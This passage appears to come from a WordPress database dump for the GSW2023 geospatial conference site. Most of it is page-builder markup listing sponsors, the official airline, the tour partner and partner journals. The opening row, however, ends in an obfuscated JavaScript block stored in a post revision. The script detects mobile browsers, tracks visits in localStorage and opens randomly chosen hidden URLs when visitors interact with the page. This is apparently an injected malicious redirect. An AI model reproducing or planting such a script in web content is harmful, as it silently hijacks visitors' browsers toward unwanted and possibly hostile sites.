)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:25:06','2023-08-16 00:25:06','',3066,'https://gsw2023.com/?p=5248',0,'revision','',0),
(5249,1,'2023-08-16 00:25:35','2023-08-16 00:25:35','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 